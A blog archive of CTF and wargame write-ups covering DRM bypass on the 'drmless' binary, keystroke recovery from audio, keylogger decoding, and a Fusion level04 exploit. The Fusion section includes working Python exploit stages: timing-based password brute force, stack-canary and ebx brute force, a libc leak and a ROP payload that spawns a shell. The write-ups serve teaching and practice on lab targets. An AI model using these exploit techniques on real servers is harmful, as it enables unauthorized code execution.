            do_sha3(state, &gold_collected, 32, 0, 0);
            do_sha3(state, 0, 0, &dest, 32);

            // printf("\n");
            // exit(-1);
            msg = youwin();
            // printf("msg = %s " , msg);
            if(strcmp(msg,"WIN    ...but no flag for you.")){
                printf("msg = %s \n" , msg);

The rest of the code can be found in this archive. This code comes from the KeccakRefernceAndOptimized distribution, a bit cleaned up so that it only contains my brute-forcer. If you run it starting at offset 2946 you'll see the solution:

sfx@deb64:~/dev/pctf2013/KeccakReferenceAndOptimized$ bin/KeccakOptimized64 2946
[*] i = 2946
msg = b2ute_f0rce_1s_7he_b3st_f0rce 

Although we didn't finish it on time, it was a fun challenge to look at (albeit frustrating because I failed at solving it!)

Friday, April 26, 2013

PlaidCTF 2013 - drmless (binary 250) write-up

One of the challenges I looked at during the last PlaidCTF was 'drmless', and since I didn't see a write-up yet I thought it'd be nice to publish one. Again this is cross-posted on my blog and int3pids blog.
For this challenge, we were provided with a drmless.tgz file containing a few things:
  • .drmlicense : A 16 byte file with some hexadecimal contents
  • cool_story.enc : A 'cool story' encrypted.
  • cooler_story.enc : An even 'cooler story' also encrypted.
  • drmless : an ELF binary.
  • readme.txt : challenge instructions.

If we read the instructions, we see the following text:
Here's a cool story from PPP!
We wrote an even cooler story, but you need to pay
us if you want to unlock it. TEN THOUSAND DOLLAR.
If we run 'drmless cool_story.enc' after extracting the archive on a 32 bit Linux machine we get a nice decrypted file. If we attempt to do the same on the cooler_story.enc file, we are told that this is a binary file and asked whether we want to view it anyway. Sounds like the 'less' program, doesn't it?
So we have a file we can decrypt, and one we cannot. The objective is to decrypt the other one, presumably by altering the drmlicense or bypassing it in some way. Let's look at the binary to find out what's going on.
At startup, the binary loads the .drmlicense file and reads 16 bytes into the 'license' global buffer:
  v2 = getenv("HOME");
  snprintf(&v27, 1024, "%s/.drmlicense", v2);
  v3 = open((const char *)&v27, 0);
  if ( v3 >= 0 || (v3 = open("/.drmlicense", 0), v3 >= 0) || (v3 = open("./.drmlicense", 0), v3 >= 0) )
    read(v3, license, 16);
If we search for cross-referneces to license, we see it is only used in the 'undrm' function, which looks like this:
int __cdecl undrm(int a1)
  int result; // eax@1

  aes_wb_decryptor(a1, a1);
  result = 0;
    *(_BYTE *)(a1 + result) ^= license[result];
  while ( result != 16 );
  return result;
So apparently 'drmless' uses this aes_wb_decryptor function to decrypt the data, and then XORs it with the license. It is interesting to note that only the input buffer is passed to the decryptor, which means that it either uses a hardcoded key or it is stored in some global variable.
Also, it is interesting to note that the name indicates this is probably a whitebox implementation. This means the implementation is obfuscated in an attempt to withstand static/dynamic analysis, and most likely the key is mixed into the algorithm itself in some way.
In any case, I have read documentation on whitebox cryptography before, and also analyzed some implementations of it. Based on that experience, I had some ideas on how to approach a whitebox implementation, but I also knew that I should probably focus on the stuff around the whitebox before diving into the whitebox itself.
Just for fun, I look at the implementation and quickly saw that each round of AES is splitted into several functions, and they are all called sequentially.
.text:0829FF19 loc_829FF19:                            ; CODE XREF: aes_wb_decryptor+7089 j
.text:0829FF19                                         ; aes_wb_decryptor+7094 j ...
.text:0829FF19                 mov     eax, [ebp+var_24]
.text:0829FF1C                 call    r013
.text:0829FF21                 mov     [ebp+var_59], al
.text:0829FF24                 mov     eax, [ebp+var_30]
.text:0829FF27                 call    r020
.text:0829FF2C                 mov     [ebp+var_7B], al
.text:0829FF2F                 mov     eax, [ebp+var_2C]
.text:0829FF32                 call    r021
.text:0829FF37                 mov     [ebp+var_7A], al
.text:0829FF3A                 mov     eax, [ebp+var_28]
.text:0829FF3D                 call    r022
.text:0829FF42                 mov     [ebp+var_79], al
.text:0829FF45                 mov     eax, [ebp+var_24]
.text:0829FF48                 call    r023
.text:0829FF4D                 mov     [ebp+var_78], al
.text:0829FF50                 mov     eax, [ebp+var_30]
.text:0829FF53                 call    r030
I also saw no global key seems to be input to the algorithm, so I started treating it as a decryption oracle and turned into the more interesting XOR with the license and its possible implications.
The first thing I did was looking for cross-refs to 'undrm'. I found it is used in the 'drmprotected' function to decide whether a file is DRM-protected or not:
signed int __cdecl drmprotected(int a1)
  int v1; // ebx@4
  int v2; // eax@5
  char v4[16]; // [sp+10h] [bp-48h]@4
  char v5; // [sp+20h] [bp-38h]@4
  char v6; // [sp+30h] [bp-28h]@4
  char v7; // [sp+40h] [bp-18h]@4

  if ( !old_bin_file(a1) || !seekable(a1) || lseek(a1, 0, 0) == -1 )
    return 0;
  v1 = read(a1, v4, 64);
  if ( v1 > 0 )
    v2 = 0;
    if ( v4[0] < 0 )
      return 0;
    while ( 1 )
      if ( v1 <= v2 )
      if ( v4[v2] < 0 )
        return 0;
  return 1;
This just decrypts the first 64 bytes of a file and performs some checks on it. If the checks pass, the function returns 1, otherwise it returns 0. At this point I strongly suspected this was all the protection that was to be found. So I decided to set my drm license to all-zeros, force the 'drmprotected' function to return 1 and dump the data into a file.
I did this using this vtrace script and running it with the cool and the cooler story. The script still requires you to go through the whole output by pressing 'space' until reaching the end, in the same way you'd navigate through a file with 'less'.
sfx@deb:~/drmless/$ python cool_story.enc cool_story.dec
sfx@deb:~/drmless/$ python cooler_story.enc cooler_story.dec
After this, I used xortool from Hellman to analyze the output files. When run with the 'cool story' it lead to the original .drmlicense contents... so I ran it against the cooler story and used the resulting key to decrypt the output:
sfx@deb:~/drmless/xortool-master$ python -l 16 ../cool_story.dec -c 20
1 possible key(s) of length 16:
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ python -l 16 ../cooler_story.dec -c 20
1 possible key(s) of length 16:
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ cd ...
bash: cd: ...: No such file or directory
sfx@deb:~/drmless/xortool-master$ ls  args.pyc  colors.pyc  libcolors.pyc  routine.pyc  tests  xortool_out
sfx@deb:~/drmless/xortool-master$ cd ..
sfx@deb:~/drmless$ ls
cooler_story.dec  cool_story.dec  drmless  story.dec  util.pyc
cooler_story.enc  cool_story.enc  readme.txt    xortool-master
sfx@deb:~/drmless$ python
Python 2.7.3 (default, Mar  5 2013, 01:19:40) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import util
>>> x = open('cooler_story.dec').read()
>>> key = "\xfe\xed\xa1\x07\x0f\xf0\rp\xde\xad\xbe\xef\xfa\xceUU"
>>> y = util.repxor(x,key)
>>> y[:100]
'TWELFTH NIGHT; OR, WHAT YOU WILL\r\n\r\nby PPP\r\n"freeShakespeare_downWithDRM"\r\n\r\n\r\n\r\nPERSONS REPRESENTED'

The key is: freeShakespeare_downWithDRM
So here it is, 250 points :)

Wednesday, March 13, 2013

Fusion 04 exploit write-up

Last week I started playing with the exploit exercises from the Fusion VM at The first level was a straightforward stack overflow without any mitigations. Next came one with ASLR for the stack, which was easy to bypass with a simple jmp *esp found in the main binary. Next level up added NX, so I had to resort to ROP, which was also simple by using ROPGadget to generate a payload based off libc (and fixing up the chain due to a bug in ROPGadget 3.3).

Now, level04 was slightly more difficult. It is a web server compiled with stack cookies (SSP), position independent code (PIC/PIE) and configured to run with ALSR and NX. So this gives us a few protections we need to bypass or work around somehow.

Because of this, I thought it was interesting to share and maybe request some feedback... who knows, maybe there are easier solutions and I am just complicating my life :) You can also find a copy of this post at my personal blog

Additionally, the web server generates a random password which you need to provide in order to hit the vulnerability and control the instruction pointer. Looking at the validate_credentials function, we see this code:

int validate_credentials(char *line)
  char *p, *pw;
  unsigned char details[2048];
  int bytes_wrong;
  int l;
  struct timeval tv;
  int output_len;

  memset(details, 0, sizeof(details));

  output_len = sizeof(details);

  p = strchr(line, '\n');
  if(p) *p = 0;
  p = strchr(line, '\r');
  if(p) *p = 0;

  // printf("%d\n", strlen(line));
  base64_decode(line, strlen(line), details, &output_len);
  // printf("%s -> %s\n", line, details);
  // fflush(stdout);
  p = strchr(details, ':');
  pw = (p == NULL) ? (char *)details : p + 1;

  for(bytes_wrong = 0, l = 0; pw[l] && l < password_size; l++) {
    if(pw[l] != password[l]) {
#if 0
      char *buf;
      asprintf(&buf, "[%d] wrong byte (%02x vs %02x)\n", l,
                          password[l], pw[l]);
      write(58, buf, strlen(buf));

  // anti bruteforce mechanism. good luck ;>
  tv.tv_sec = 0;
  tv.tv_usec = 2500 * bytes_wrong;

  select(0, NULL, NULL, NULL, &tv);

  // printf("%d bytes wrong!\n", bytes_wrong);

  if(l < password_size || bytes_wrong) 
    send_error(401, "Unauthorized", 
    "WWW-Authenticate: Basic realm=\"stack06\"",

  return 1;
So there is a clear timing leak on line 208 which tells you how many bytes were wrong. Additionally, the base64_decode function seems to take the length of the output buffer but then this is what it does with it:

void base64_decode(const char *data,
                    size_t input_length,
                    unsigned char *output,
                    size_t *output_length) {

    if (decoding_table == NULL) build_decoding_table();

    // printf("data: %p, input_length: %d, output: %p, output_length: %p\n",
    // data, input_length, output, output_length);

    if ((input_length % 4) != 0) {
  // printf("len % 4 = fail\n");

    *output_length = input_length / 4 * 3;
So, it just overwrites it with the computed output buffer and goes ahead and decodes it. Thus, we have a stack based buffer overflow but in order to exploit it we first need to recover the random password so that the function returns and uses the pops the return address off the stack.

Discovering the password is fairly easy thanks to the timing leak: we just brute force byte by byte, measuring the time to see if we found the right character or not. In my case, the timing difference is below 0.001 when we hit a good value and above it when we do not, so I just check for that:

def check_password(s, password):
 req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password)
 resp = ""
 resp = resp + s.recv(1024)
 auth = "Unauthorized" not in resp
 return (auth, resp)

# First find auth password
def find_next_char(password):
 done = False
 for current_char in string.ascii_letters+string.digits:
  s =  get_connection(ip,port)

  t0 = time.time()
  found,resp = check_password(s, password+current_char)
  t1 = time.time()

  #If found or time indicates current char is good...
  if found or (t1-t0) < 0.001:
   print "[*] Found character %d = %s" %(len(password)+1,current_char)
   return (found,password+current_char)

 return (False,password)

def find_password():
 password = ""
 found = False
 while(not found) and len(password)<16:
  (found,password) = find_next_char(password)
 return password
So this piece will find us the password. What's next? Well, we can use this to overwrite some data and hopefully hijack EIP. But... as I mentioned above, there is a catch: there is a stack cookie protecting EIP.

Since we can feed any binary data of any size (thanks base64 decode :) ), we can brute force the stack cookie byte by byte. When we see a stack corruption, we guessed an incorrect value. When the program goes on normally, we hit the right result. Again, this is the code implementing that part:

def find_cookie(password,cookie = ""):
 while len(cookie)!=4:
  for i in xrange(256):
   # print "[*] Test ", i
   s = get_connection(ip,port)
   found,resp = check_password(s,password + "A"*2024+ cookie + chr(i))
   if "smashing" not in resp:
    # print resp
    cookie = cookie + chr(i)
    print "[*] Cookie value is 0x%s" % cookie.encode("hex")
    print resp
 return cookie
At this point, we can reliably set EIP since we know the stack cookie value. However, that's not very helpful since everything is randomized thanks to full ASLR and a PIC binary. The first thing I tried here was overwriting the last byte of the saved EIP to land on a call to printf() or some other function returning data. This would help me obtain some data from the stack, and then I could create a ROP payload based on the leaked data.

However, then I hit another problem: ebx is used by the code to contain a reference to the binary loading address + some offset. This is done to achieve position independent code. Unfortunately, the exploit also overwrites ebx, which was stored by validate_credentials just between the stack cookie and the return address.

So what I did next was guessing ebx in the same way I did for the stack cookie. However, here I started with the known last byte (the lowest 12 bits of the binary are not randomized) and brute forced the rest. Again, the code is very similar to the previous one:

def find_ebx(password,cookie):
 ebx = ""
 s = get_connection(ip,port)
 found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3)
 while len(ebx)<4:
  for i in xrange(0,256):
    s = get_connection(ip,port)
    found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) )
    if resp == base_resp:
     ebx = ebx + chr(i)
     print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex")
   except socket.error:
    # print "[*] Fail"
  if i==255:
   print "[*] Could not discover ebx value. Exploit failed."
 return ebx
This code first obtains a 'normal response'. Next, it starts bruteforcing ebx byte by byte, comparing the response with the 'expected response'. If it matches, the right value was found, else it iterates to the next candidate.

Now, with this done we are able to compute the base for the binary by subtracting 0x4118 from the leaked ebx value. After finishing the exploit I realized that this was actually not needed, since the stack smashing detection code prints out a very helpful memory map into stderr, which is redirected to our socket. Anyway, with this code the exploit doesn't rely on that leak so it would work even if stderr is not redirected to our socket.

At this point I had two options: use this to leak the libc or make a ROP payload based on the binary. Since I already had a payload for libc made with help of ROPGadget (which I had to correct due to some bug by the way), I decided to return into write and leak the first GOT entry to obtain the libc base. Therefore, the final stages of my exploit look like this:

base = struct.unpack("<I", ebx)[0] - 0x22FF - 0x1E19
write_plt = struct.pack("<I",base + 0xF30 ) #write PLT entry
got_base = struct.pack("<I",base + 0x4124 ) # GOT start

print "[*] Binary base: 0x%.8x . Leaking libc base" % base
print "[*] PLT entry for printf @ ", write_plt[::-1].encode('hex')
print "[*] GOT start @ ", got_base[::-1].encode("hex")

s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + "AAAA"*3 + write_plt + "AAAA" + "\x01\x00\x00\x00" + got_base + "\x04\x00\x00\x00")
libc = struct.unpack("<I", resp[:4])[0] - 0xd3a70
print "[*] Discovered libc base: 0x%.8x" % libc 

print "[*] Launching ROP exploit"
p = get_rop(libc)
s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*7 + p)
After this, a nice shell is running for us. With only one catch: an alarm is set by the webserver, and it will trigger a SIGALRM signal soon. So what I do is just executing trap '' SIGALRM; as a first command so that the signal is ignored. The full exploit code is here for you to play with :)


Even in the presence of quite some countermeasures (fully randomized addres space, non-executable data areas, stack smash protection), it is still possible to achieve reliable code execution.

In this case, we have abused the fact that the vulnerable server does not call execve() for every new child to brute-force the stack cookie and also to discover the base address of the executable itself. After this is done, it is basically game over.

However, these techniques have two requirements: the address space has to remain constant between requests (albeit random every time we restart the whole server) and we need to be able to partially corrupt the data with fully arbitrary values. If these requirements were not met, another info-leak bug would have been required in order to obtain this data.

Thus, as an application programmer it is always recommended to call fork()+execve() instead of just fork(), so that the OS re-randomizes the whole address space.

Thursday, May 10, 2012

PlaidCTF 2012 – Traitor (200 pts)

Although this challenge was given a score of only 200 points, nobody solved it during or after the PlaidCTF contest, so I decided to give it a chance as a personal challenge, because I saw it very interesting from a technical point of view.

By the way, congrats to the PPP team for the awesome organization of the CTF and its challenges. :-)

Original description

"Top operative laser mic'd a room where a robot conspirator was logging into the robot government's secret interface. We were able to clean up the audio file significantly, but have no clue anymore."


The challenge is supposed to be very straightforward, because we only have a recorded audio file of someone typing in a keyboard. Assuming that each key emits a different sound when pressed, if we have enough keystrokes, theoretically we should be able to infer the text being typed, making some assumptions (like the expected language and so on).

After listening carefully to the 6 minutes of the audio file, and given the general quality of the challenges, we can safely assume that other approaches (like steganography or guessing) have to be much less probable.

A summary of the process to follow would be:
  • Detect and separate each keystroke
  • Group them according to their sound patterns and similarity
  • Given a keystroke, classify and tag it according to its group
  • Generate a cryptogram with the tagged keystrokes
  • Solve the cryptogram assuming a monoalphabetic substitution cipher

Detecting the keystrokes

Instead of applying a formal method, I started writing some code and testing with some variations and I decided to follow that empirical way, keeping the process as simple as possible, so probably some part of my process is unnecessary or even have a negative impact on the final results or accuracy.

Well, my first step was to clean the audio, reducing the background noise and randomness of the signal, mainly by filtering and minimizing the lowest frequencies.

Original audio signal

Filtered audio signal

Then, I saved this filtered audio as raw PCM data (44100 Hz, 16 bits, mono), instead of the compressed MP3 format of the original file, so now we have the signal directly represented as a byte array, which is a necessary step in order to perform calculations over it.

Each sound can be decomposed as a sum of frequencies, and a well-known mathematical operation to get those frequencies from its time representation is the Fourier transform. Our input is sampled data in time domain, so we will use the Discrete Fourier Transform (DFT) to transform it to the frequency domain.

We can try to detect the beginning of each keystroke based on the amplitude of the signal, and then start taking samples from these points, but I decided to start with a simpler approach, dividing uniformly the whole signal in blocks of the same size, and calculate its DFT.

Spectral view of the same audio signal

I chose a window size of 2048 samples (46 ms) because in average is big enough to fit a whole keystroke alone (without overlapping with the closest ones), so we will have to compute the DTF of 3840 blocks in total. The DTF function will output a sequence of complex numbers, but for our purposes of spectral analysis, we can simplify and take their magnitude as a valid measure, so we will use an array of integers to hold each DFT.

Once we have the DFT of each block, we can try to determine if it contains the sound of a keystroke or not by estimating the energy or power of the signal and checking if it's greater than a threshold. For instance, this can be done by summing the squares of each value.

After getting rid of the silence blocks, I simplified each remaining DFT again by calculating the average of each 16 values (so the final length of the DFT arrays will be 64), trying to minimize the impact of the noise and randomness.

Let's see the spectrum graph of some keystrokes to see what we have done until now:

Comparing different and similar keystrokes

Well, as we might expect, we can clearly appreciate the difference between the graphs of the presumably different keystrokes (on the left), and the similarities of the keystrokes that appear to be originated by the same key (on the right).

Grouping the keystrokes

Now we can sort all of these samples by some indicator of their similarity. For this task I tried with a very simple method, minimizing the Euclidean distance of the DFT vectors between each pair of consecutive samples. To check if that method was apparently good enough or not, I saved that sorted samples in a new audio file, getting the following:

Keystrokes sorted by minimum distance

The results are quite impressive, because the consecutive samples sound almost identically, and at the same time we can clearly see that they are also sorted by energy, so the first ones are more likely to be echoes rather than being keystrokes.

The last step involving the audio data is to group and tag all the samples. There are a lot of IA algorithms to classify a group of samples, but again, I decided to choose one of the simplest ones: scrolling the spectral view of the sorted samples manually and writing down in a paper the exact instants when the frequencies changes substantially (it could be done visually and aided by the sound itself).

Visual representation on how I divided the groups

In the transition zone between a group and the next one, sometimes we'll find some samples which aren't clearly belonging to the first or the second group, but the error rate should be small in any case, and should not affect the global recovery of the text, because we have a lot of samples compared with the number of groups.

Tagging the keystrokes

In my implementation, the algorithm detected 1993 positive samples, and then I classified them in 42 different groups (much more than the expected 26 letters of the alphabet plus the space bar, carriage return and some punctuation signs). There are many reasons to justify this fact, but let's continue with the process and they'll be explained later.

In my opinion, a real keyboard won't produce so many different and distinguishable sounds, like the keys of a piano, but most keys have to sound almost identically. At this point, we can suspect that the audio file isn't a real recording, so if it's specifically generated to be solvable, there could be a chance that each sound has some direct relationship with its ASCII code or something, but I didn't found any.

In a real scenario, the process should require more complex methods and algorithms, involving accurate cepstrums, training, probabilities, Markov chains, neural networks and so on, but in our case we will be tagging each group sequentially (for instance, starting with the labels "a", "b", "c"…), and then sort them again according to the original positions of each sample. After that process, we will have a text cryptogram ready to be solved.

Solving the cryptogram

I started replacing the labeling the biggest groups, assuming that they have to be the space bar or the letter "e" (the most frequent keys in English), checking if the cryptogram is still consistent with the expected average word lengths. After that, I continued analyzing and replacing the most common or unusual word patterns, for instance, assuming that the ones of 3 letters have to be words like "the" or "are", the ones of 5 or 6 letters that matches with "robot" and "robots", or the almost unique pattern of the word "effective" (which appears 3 times in the text).

Finally, after replacing most of the letters, we have a lot of readable phrases, and we can infer new conclusions. The most important conclusion is that some special keys (like shift or enter) are actually emitting multiple and different sounds when pressed and when released. We can see it clearly at the beginning of the phrases, because they are starting with an uppercase letter. By the way, although we can read most of the text, this detail will be crucial to solve the challenge, as we will see.

My recovered text

Finally, this is the raw text I managed to recover from the audio, without any manual correction. Some notes regarding this text:

  • The uppercase letters are the ones which have been replaced
  • The lowercase are some of the original tags of the different groups (so they are quite random and have no real meaning), because their classification wasn't good enough
  • The symbol "^" represents the shift key press, and "-" is the release of this key









Well, we can see that the recovered text was not perfect (probably because I simplified excessively the process), but it's highly readable and I stopped there, although with some refinements the algorithm probably could perform better.

The original text was taken mainly from the synopsis of the PlaidCTF, and the flag seems to be one of the sentences at the beginning. My first attempt on the scoring panel would have been: "My keystrokes are FAR too loud", so I contacted the organizers explaining what I did and they told me that I was close, but it wasn't the correct flag (and revealed me the right one).

The original text

According to the organizers, this was literally the original text (and they used a script to generate the audio file). In this case, the "^" symbol represents a pause.

My keystrokes are >>WAY<< too loud
^^^^^^^^^^^^mail -s "DANGER: HACKERS"
^It seems that the humans are gathering their forces:

Greetings traveller,

As you know, our world is in peril. Our enemies, the robots, become more
powerful with every passing day. Before we are captured and all hope is lost, we
must make one last stand against them for all of humanity.

Up until now, our only effective tools against the robots have been brute force
and diamond weaponry. Obviously diamonds are effective for a number of reasons
(hard enough to cut through robot armor, strong enough to make effective
restraints, and shiny), however, the robots are knowledgeable of these tools,
and have been quite successful in raiding our diamond storage facilities.
Further, although our knights are brave, the robots are numerous, and very
difficult to defeat.

Luckily, we have a secret weapon. You. Hackers.

It has recently come to our attention that our robot foes are full of bugs. Few
are skilled enough in the types of wizardry required to find these bugs, but
when they are found, these bugs provide an easy way to take over and destroy
the robots. Further, many of the robots have hidden destruction code sequences:
find the sequence, and we can cause the robot to self destruct.

With our diamond supply dwindling and our army of knights limited, our plan is
to make a hacking blitz to catch the robots by surprise. We are calling all the
hacking wizards across the land to work together for 48 hours to take out as
many robots as possible. With enough help, we think it will be possible to
overcome our robot enemies and destroy their evil reign.

We are counting on your help, good luck.


Final remarks

When I saw the angle brackets on the flag, I thought that they were emphasizing the wrong word in my expected flag, but no, they weren't… these symbols are actually part of the flag!

I can imagine when somebody thought something like: "Hey, this challenge is very easy, so let's give it 200 points only, and to make it harder, let's use a flag with short words and strange symbols in the middle" xDD

Initially, I argued them that it was impossible to determine that symbols of the flag, as they weren't used in any other part of the text, but they replied to me that the angle brackets, in the American keyboard layouts, are the same keys (and sounds) of comma and dot, combined with the shift key. So yes, they're right and I completely agree, but I didn't noticed that, mainly because in my Spanish keyboard (and many others) these symbols are sharing the same key, so they are in a different location, and also, in the text I recovered, the process missed and confused some keystrokes.

Tuesday, May 1, 2012

PlaidCTF 2012 - Editors (100 pts)

Past weekend, we participated in Plaid CTF 2012 (perhaps the best CTF I've ever played, kudos to PPP!). I haven't seen any write-up about "Editors" challenge so here we go...

At first sight, this challenge seems simple and even easy to solve by guessing. But it turned out to be not so easy but a real mess :)

What we know:
"We recently gained access to a log (handout.txt) of a robot operative interacting with computer. We are unsure what he was up to but we know  it is of the upmost importance to figure it out."
We are also given following hints:
1. In /etc/sudoers, editor=/usr/bin/emacs
2. Try out yourself!
3. By the state of the machine, we mean either 'on' of 'off'.
After opening .txt file we can read:
"We received the following from our keylogger.  Please submit to us the number of times the editor default in sudoers is set, followed by that field's final value, followed by the number of shells invoked, followed by the state of the machine."
That's all we have. So it's your chance now... try to solve it without our help! Or keep on reading if you are not brave enough! }:-) (seriously, try it yourself!).

- - -

Text was taken from a keylogger so it must contain keycodes. First task is building some kind of conversion table:

  • 1b     ->  <esc>
  • 1b 1b  ->  <esc><esc>  or  <alt-esc>
  • 01     ->  <ctrl-a>
  • 09     ->  <tab>  or  <ctrl-i>
  • 02     ->  <ctrl-b>
  • 1b 30  ->  <esc>0  or  <alt-0>
  • 18     ->  <ctrl-x>
  • 13     ->  <ctrl-s>
  • 03     ->  <ctrl-c>
  • 0a     ->  <ctrl-j>
Some ambiguities arise but we could try to solve it by context, or in other words, by reading different documentation like:
- teco:
- screen 

Below this is the final text we built (with big effort and pain :-)). We need to know when a new shell is opened and when a modified sudoers is written (this is important: sudoers should be truly modified in order to count). Our approach was to reproduce typed text in order to understand it better. See inline comments.

ssh user@1337box<enter>  [ No new shell is opened *in our box* ]
ksu -l<enter>     [ Now I'm root. But no new shell is opened! ]
ub3rstongdeemonsfromtehsewarsZZZ!<enter>   [ Ups, root password! ]
screen<enter>     [ Shell++ (=1) ]
<ctrl-a>S         [ Split window ]
<ctrl-a><tab>     [ Switch to lower window ]
<ctrl-a>c         [ Open shell in lower window -> Shell++ (=2) ]
tmux<enter>       [ Open tmux in lower window  -> Shell++ (=3) ]
<ctrl-b>%         [ Lower window is splitted   -> Shell++ (=4) ]
<ctrl-a><tab>     [ Switch to upper window ]
tmux<enter>       [ Open tmux in upper window  -> Shell++ (=5) ]
<ctrl-b>%         [ Upper window is splitted   -> Shell++ (=6) ]
emacs --daemon<enter>
EDITOR="emacsclient -nw"<enter>
<ctrl-a><tab>     [ Switch to lower window ]
<ctrl-b>o         [ Switch to lower-left window ]
EDITOR=vim visudo<enter>   [ Open sudoers with Vim ]
:%s/emacs/vim, /g<enter>   [ Now "editor=/usr/bin/vim," -> Comma is wrong! ]
:wq<enter>        [ Syntax error when saving to sudoers due to comma ]
<ctrl-b>&y        [ Kill lower-left window. We have now 1 lower window (and 2 upper) -> Shell-=2 (=4) ]
<ctrl-a><tab>     [ Switch to upper-right window ]
<ctrl-a>Q         [ We have 2 windows: left and right. We are at right (EDITOR="emacsclient -nw") ]
visudo<enter>     [ Open sudoers with Emacs ]
<ctrl-b>o         [ Switch to left window ]
ln -s /sbin/poweroff exec<enter>  [ I'm root so sym-link is created correctly ]
ed /etc/sudoers   [ Open sudoers with Ed (in left window; keep open Emacs in right one ]
<ctrl-b>o         [ Switch to right window (Emacs) ]
<esc>OB<esc>OB<esc>OB...   [ Move cursor down by 8 lines ]
<esc>OC<esc>OC<esc>OC...   [ Move cursor 31-times right ]
<esc>[3~<esc>[3~...        [ Delete 7 times ]
teco              [ We add "teco" ]
<ctrl-b>o         [ Switch back to left window (Ed) ]
w /etc/sudoers<enter>   [ Save /etc/sudoers ]
q<enter>          [ Close Ed ]
<ctrl-b>o         [ Switch to right window (Emacs) ]
<ctrl-x><ctrl-s>  [ Save sudoers.tmp (but not real sudoers file!!) ]
<ctrl-x><ctrl-c>  [ Close Emacs -> Save /etc/sudoers AGAIN!! ]
<ctrl-b>&y        [ Only 1 window -> Shell-=2 (=2) ]
<ctrl-a>ky        [ Shell-- (=1) -> Only Screen process is left running ]
./exec<enter>     [ Still root (ksu) -> Shutdown machine -> off ]

Summary, we have done 2 (real) changes in sudoers, "teco" remained as editor in sudoers (last successful modification was done with Emacs), we have opened 6 shells and machine state is "off".

The solution to the challenge is: